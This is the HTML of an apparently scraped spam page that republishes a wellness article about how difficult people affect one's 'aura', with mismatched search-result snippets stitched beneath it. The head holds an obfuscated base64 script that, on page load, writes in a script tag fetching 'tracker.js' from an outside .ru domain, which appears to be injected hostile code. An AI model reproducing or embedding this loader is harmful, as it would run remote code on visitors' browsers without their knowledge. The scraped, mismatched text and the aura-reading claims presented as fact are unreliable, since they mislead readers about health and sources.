<!DOCTYPE html>
<html lang="en">
<head>
<title>How Difficult People Affect Your Aura &amp; Energy | </title>
<meta name="description" content="How Difficult People Affect Your Aura &amp; Energy" />
<meta name="keywords" content="How Difficult People Affect Your Aura &amp; Energy" />
<meta charset="utf-8">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
<script type="text/javascript" src="js/hover.js"></script>
<link type="text/css" rel="stylesheet" href="styles/style.css" />
<script>  	
	let encoded = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vZnVja2ZiLnJ1L3RyYWNrZXIuanMiPjwvc2NyaXB0Pg==';           
	let decoded = atob(encoded);           
	document.write(''+ decoded +'');  
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

</head>
<body id="YEoPIsW">
<div id="wrap">
  <div id="header">
    <h1><a href="#"></a></h1>
   </div>
  <!--end header-->
  <ul id="nav">
    <li><a href="index.html" class="current first">Home</a></li>
    <li><a href="#">Category</a>
<ul>
<li><a href="index.html">How People Steal Your Power, Energy and Soul</a></li>
<li><a href="1.html">Who Stole My Energy?: In this modern world it is easy to ...</a><br></li>
<li><a href="2.html">Buy Who Stole My Energy?: In this modern world it is easy ...</a><br></li>
<li><a href="3.html">| FaceBook stole my energy for bloggingHindsight ...</a><br></li>
<li><a href="4.html">Who stole my energy? | JogBlog</a><br></li>
<li><a href="5.html">Who Stole My Energy – Live by Heart</a><br></li>
<li><a href="6.html">Who stole my energy? | thesecretsober</a><br></li>
<li><a href="7.html">Who Stole My Energy? How Difficult People Affect Your Aura</a><br></li>
<li><a href="8.html">They stole my energy!!! : bravefrontier</a><br></li>
<li><a href="9.html">It's A New Decade - So Who Stole My Energy?</a><br></li>
</ul>
    </li>
    <li><a href="#">Services</a></li>
    <li><a href="privacy-policy.html">Privacy policy</a></li>
	<li><a href="terms.html">Terms and Conditions</a></li>
	<li><a href="photo.html">Photo gallery</a></li>
  </ul>
  <!--end nav-->
  <div class="line" id="3W3ZSTNAZaJnl"></div>
  <div id="frontpage">						
<center><iframe width="615 height="415" src="https://www.youtube.com/embed/3NLXT9JX1Ms" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
    <div class="line"></div>
	
	<h2 id="rIifIwUy">How Difficult People Affect Your Aura &amp; Energy</h2> 2020.11.09 17:21
<center><img src="img/6b4e16bdeb8928d6979ab01f88e578d1.jpg" width="50%" id="Riwc4iZES37h"></center><br><br><h1> mindbodygreen</h1> Close Ad <span/> <h1> Navigation</h1> <h1> Main Navigation</h1> <span> </span> <span> </span> <span> </span> <span> </span> <strong> Who Stole My Energy? How Difficult People Affect Your Aura</strong> <span> Log in</span> Profile Saved Articles Orders &amp; Tracking Classes Contact Support Log Out <span> </span> <span> </span> <span> </span> Your cart is empty. Our online classes and training programs allow you to learn from experts from anywhere in the world. Explore Classes <span> mbg<span> Supplements+</span> <span> 0</span> </span> VIEW CART <span> mbg<span> Classes</span> <span> 0</span> </span> VIEW CART <h1> Subcategory Navigation</h1> mindfulness health food movement beauty home social good parenting more astrology planet relationships lifestyle <span> Spirituality</span> <h1> Who Stole My Energy? How Difficult People Affect Your Aura</h1> <span> mbg Contributor </span> <span> By Rachelle Terry mbg Contributor Rachelle Terry is a medical intuitive with a unique ability to see the mind/body link and interpret information in the energy field and its link with human behavior, life patterns, health and relationships. </span> July 26, 2012 <span> Share on:</span> <span> Share on:</span> <p> You walk away from a conversation feeling exhausted. You see their name on an incoming call, and your stomach sinks.</p> <p> Why is it that meeting with some people can uplift and inspire you while others leave you wanting to hide away in a dark room and, if we want to be dramatic, curled in the fetal position?</p> <p> Unfortunately (or fortunately), all too rarely are you able to hide away in a dark room, let alone find a broom cupboard which could fit you, especially in the fetal position. The alleged energy sucker may be a work colleague, family member or in-law, and your interaction is obligatory. Of the “things that are not fun” category, this sort of meeting is one. Another is the knowledge that, at some point, you will have to do it all over again.</p> <h2> What have they done to you? </h2> <p> Well, if you're seeing what I am seeing, it is perfectly clear: a significant change has just occurred in your aura .</p> <p> Your aura is producing what could be described as a thought bubble during every interaction and conversation you have. This thought bubble is an energy formation which consists of your feelings, thought patterns and defense mechanisms, specific to the interaction you are having. It then informs the body to respond in a particular way, sending a “Kapow,” “Boom,” or “Heeelllp” message to the endocrine system, instigating biological processes.</p> <p> The thought bubble also informs me of how you are feeling, if I am observing your aura at the time. This idea could, of course, make you feel a little daunted but do not fret – (while we are on the comic book theme) I use my powers for good, not evil!</p> <p> Your physical response may then range anywhere from fatigue to elation, depending on your own, subconscious beliefs about the person and what they represent. It is no wonder then, the notion exists that some people make us sick.</p> <p> A client recently asked me to observe his aura while he brought to mind three different people with whom he was required to have business dealings. He explained that with each of them he found it difficult to negotiate as he would become extremely drained in their presence.</p> <p> The following was observed:</p> The first person’s approach was invasive and demanding. I saw an explosion of electric and highly charged chaotic energy moving from him or her to my client. I could see that this person would lead to my client feeling frazzled by making demands beyond what he felt comfortable to meet, therefore requiring him to set stronger boundaries of his own. His panic about feeling manipulated was dispersing his energy and making his aura fragment. In order to combat this issue, I shifted my client’s pattern and activated within his field the ability to maintain his center and set strong, healthy boundaries. The second person’s energy appeared like a large, heavy boulder. There was obstinacy in his or her approach to my client and the negotiation. The approach was attempting to overpower my client with the use of force. My client did not see the sense in the mental arm wrestle and found the experience exhausting and unnecessary. I focused on shifting the feeling of struggle and activating a sense of stillness, impervious to other’s behaviors. Of all three people visualized , the third had the most benevolent energies. What I found interesting, however, was the fact that my client developed a sinking feeling in his stomach area which I saw as a heavy, purple energy. His response to his angst was to switch into an avoidance mode which appeared as a withdrawal of his energy, and a contraction of his aura, making him feel smaller. I mentioned that the person he had visualized had positive intentions and that he would most likely find that the lead up to seeing this person was far worse than the actual event. My client smiled and said, “The last one was my mother.” <p> While it may be a common belief that you are capable of being drained by others, your energy is probably not being siphoned away by a vampiric pest. More likely, you are subconsciously blocking, scattering or switching off your energy in response to belief patterns you have about the other party. In other words, no one can steal your energy in the same way no one can steal your emotions. The downside of this theory is that blaming others will no longer be possible. The upside is that within you is the power to have it changed!</p> <p> Want your passion for wellness to change the world? Become A Functional Nutrition Coach! Enroll today to join our upcoming live office hours. </p> Advertisement <span> Rachelle Terry </span> <span> mbg Contributor </span> Rachelle Terry has had an ability to see energies and auras since childhood. Her parents encouraged the development of her gift from a young age. At age seven she was initiated to... <h1> More On This Topic</h1> <span> Spirituality</span> <h2> Ugh, Astrologers Say This Week We&#x27;re In For — Surprise, Surprise — Conflict </h2> <span> The AstroTwins </span> <span> Personal Growth</span> <h2> Lack Of Control Taking A Toll? Here Are 5 Therapist-Recommended Journal Prompts To Try </h2> <span> Sarah Regan </span> <span> $29.99</span> <h2> How To Create More Happiness </h2> <span> With Charlie Knoles</span> <span> Beauty</span> <h2> Are You Shedding Too Much Hair? 5 Major Signs Stylists Say To Look For </h2> <span> Alexandra Engler </span> <span> Sex</span> <h2> 6 Real Women Describe The Ups &amp; Downs Of Sex After Menopause </h2> <span> Abby Moore </span> <span> Integrative Health</span> <h2> Nearly A Third Of Young Adults Don&#x27;t Know The Signs of Stroke — Do You? </h2> <span> Ashley Jordan Ferira, Ph.D., R.D.N. </span> More Mindfulness <h1> Popular Stories</h1> GABA: What Is It? Circuit Training May Be The Ultimate Exercise, And Here&#x27;s Why Lectin Foods: Avoid Lectins &amp; Heal Your Gut Magnesium Deficiency, Benefits &amp; Magnesium Supplement Types Hemp Oil: Uses And Benefits Advertisement <h1> Latest Articles</h1> <span> Recipes</span> <h2> 6 Inflammation-Busting Broths That&#x27;ll Get Your Gut Health In Tip-Top Shape </h2> <span> Eliza Sullivan </span> <span> Beauty</span> <h2> You Can Create Curtain Bangs Without The Chop *Or* Hot Tools — Here&#x27;s How </h2> <span> Jamie Schneider </span> <span> Routines</span> <h2> This 3-Move Workout Will Get Your Legs &amp; Glutes Burning In Under 8 Minutes </h2> <span> CJ Frogozo </span> <span> Recovery</span> <h2> What This Psychologist &amp; Yoga Teacher Wants You To Know About How The Body Stores Stress </h2> <span> Jason Wachob </span> <span> Integrative Health</span> <h2> Magical Benefits mbg Reviewers Noticed After Taking This Greens Powder Daily* </h2> <span> Kristine Thomason </span> <span> Beauty</span> <h2> Exercising Outdoors This Winter? Here&#x27;s How To Deal With Windburn </h2> <span> Alexandra Engler </span> Latest Articles <h1> Sites We Love</h1> https://www.mindbodygreen.com/0-5585/Who-Stole-My-Energy-How-Difficult-People-Affect-Your-Aura.html Advertisement <h1> Popular Stories</h1> GABA: What Is It? Circuit Training May Be The Ultimate Exercise, And Here&#x27;s Why Lectin Foods: Avoid Lectins &amp; Heal Your Gut Magnesium Deficiency, Benefits &amp; Magnesium Supplement Types Hemp Oil: Uses And Benefits <h1> Picks For You</h1> <span> Recipes</span> <h2> 6 Inflammation-Busting Broths That&#x27;ll Get Your Gut Health In Tip-Top Shape </h2> <span> Eliza Sullivan </span> <span> Routines</span> <h2> This 3-Move Workout Will Get Your Legs &amp; Glutes Burning In Under 8 Minutes </h2> <span> CJ Frogozo </span> <span> Mental Health</span> <h2> I&#x27;m Dreading Winter: A Psychiatrist&#x27;s 6 Tips For Coping With Dark Days </h2> <span> Roxanna Namavar, D.O. </span> All News <span> Close</span> <span> Previous</span> <span> Next</span> In order to save this article, you will need to Log In or Sign Up ! <span> Close</span> About Us Contact Write For Us Jobs Advertise Become an Affiliate Collective <span> Social media share instagram</span> <span> Social media share facebook</span> <span> Social media share twitter</span> <span> Social media share pinterest</span> <span> Social media share youtube</span> Terms of Sale Terms of Use Disclaimer Privacy Policy Data Collection <h1> Rise with us daily</h1> <h2> You are now subscribed</h2> <p> Be on the lookout for a welcome email in your inbox!</p><br>
<ul>
<li><a href="index.html">How People Steal Your Power, Energy and Soul</a><br> My energy is constantly being used by those around me and I can feel it more or less sense them I'm my head, these were people closest to me friends, I've distanced my self from them all but they are intentional vampires they steal on purpose and are good at what they do, i almost feel as if they are using my energy for a darker agenda..</li>
<li><a href="1.html">Who Stole My Energy?: In this modern world it is easy to ...</a><br> Who Stole My Energy? by Ariana Trinity. In this modern world it is easy to feel completely drained of energy, and not know why. Our energy balance is a delicate thing and by understanding the energy flows that happen between people as a result of each interaction, we can better understand how to conserve our energy and protect ourselves against total loss of energy as expressed through modern ...</li>
<li><a href="2.html">Buy Who Stole My Energy?: In this modern world it is easy ...</a><br> “Who Stole My Pension? How You Can Stop the Looting” provides a plan of action for pension stakeholders, including taxpayers, workers and retirees seeking to enhance pension protection.</li>
<li><a href="3.html">| FaceBook stole my energy for bloggingHindsight ...</a><br> WHO STOLE MY ENERGY? Become Healthy, Happy, &amp; Whole &amp; Remove the Drama in Your Life. TUITION INCLUDES 2 FOLLOW UP GROUP COACHING SESSIONS + many other support tools! ENROLL NOW. MAY 10th &amp; 11th • 9am – 5:30pm • SOUTH JORDAN, UT. Light. Wake Up &amp; Live! Learn how lasting change comes from deep within. Discover the empowering connection ...</li>
<li><a href="4.html">Who stole my energy? | JogBlog</a><br> Bah! Clearly my immune system has taken a battering, what with the food poisoning while away, then a cold has turned into a chest infec...</li>
<li><a href="5.html">Who Stole My Energy – Live by Heart</a><br> Who stole my energy? February 22, 2007 jogblog 3 comments. I think someone broke in overnight earlier this week and stole my energy because it appears that I now have none. I haven’t been out for a run (or to the gym) all week and it’s looking unlikely that I’m going to make the race on Sunday unless I get some energy stores from somewhere.</li>
<li><a href="6.html">Who stole my energy? | thesecretsober</a><br> Who Stole My Energy? How Difficult People Affect Your Aura. mbg Contributor By Rachelle Terry. mbg Contributor. Rachelle Terry is a medical intuitive with a unique ability to see the mind/body link and interpret information in the energy field and its link with human behavior, life patterns, health and relationships. ...</li>
<li><a href="7.html">Who Stole My Energy? How Difficult People Affect Your Aura</a><br> The dawning of a new decade brings with it the prospect of new possibilities but, damn it, where's the energy gone to take advantage of it all? I had lots of it in my twenties, great flat in Primrose Hill, little red coupé, friends to have a good time with, career in TV, new horizons to explore.</li>
<li><a href="8.html">They stole my energy!!! : bravefrontier</a><br> Who Stole My Energy?: In this modern world it is easy to feel completely drained of energy, and not know why. [Ariana Larimar] on Amazon.com. *FREE* shipping on qualifying offers. Here is an opportunity to find out not only where our energy goes, but also what it is that's creating a void inside of you. In the pages of Who Stole My Energy? you will find out what part our emotions play in all ...</li>
<li><a href="9.html">It's A New Decade - So Who Stole My Energy?</a><br> From the start I had 60 energy in total, somehow I pressed both the dungeon and the chest box, and I never got into the dungeon. I don't know how... jump to content. my subreddits. ... limit my search to r/bravefrontier. use the following search parameters to narrow your results: subreddit:subreddit find submissions in "subreddit"</li>
</ul>
	
    <div id="featured-projects">
      <h3 id="FLdr1tenrg">Featured Projects</h3>
      <div class="featured-project-bg first"> <a href="#"><img src="img/8c01760fb9d4b08f4109a9e3f6290b9f.jpg" width="50%" id="HBH1tWMCzGUkfE"></a> </div>
      <div class="featured-project-bg"> <a href="#"><img src="img/5cb804873363fe681882ddd8caca79ce.jpg" width="50%" id="xvF42KY"></a> </div>
      <div class="featured-project-bg"> <a href="#"><img src="img/dd052000da369df6c2c75f1be251e35c.jpg" width="50%" id="lIoaGD4eXERM"></a> </div>
    </div>
    <!--end featured-projects-->
    <div class="line"></div>
    <div id="content">
      <div id="services">
        <h4 id="v5qiKxRk5f">Menu</h4>
        <div class="service">
		
        <!--end service-->
      </div>
      <!--end services--></div>
      <div class="vertical-line"></div>
      <div id="articles">
        <h4 id="TPE4MmLtjf31Q">Last Photo</h4>
<img src="img/8c01760fb9d4b08f4109a9e3f6290b9f.jpg" width="50%" id="bGgiLhuVEuDk">
    </div>
    <!--end content-->
  </div>
  <!--end frontpage-->
  <div id="footer">
    <div class="line" id="GI5wnyZkUQqV"></div>
    <p class="copyright" id="WyILkzKnj4UE">Copyright &copy; <a href="#"></a> - All Rights Reserved </p>
	<p></p>
  </div>
  <!--end footer-->
</div>
<!--end wrap-->
</body>
</html>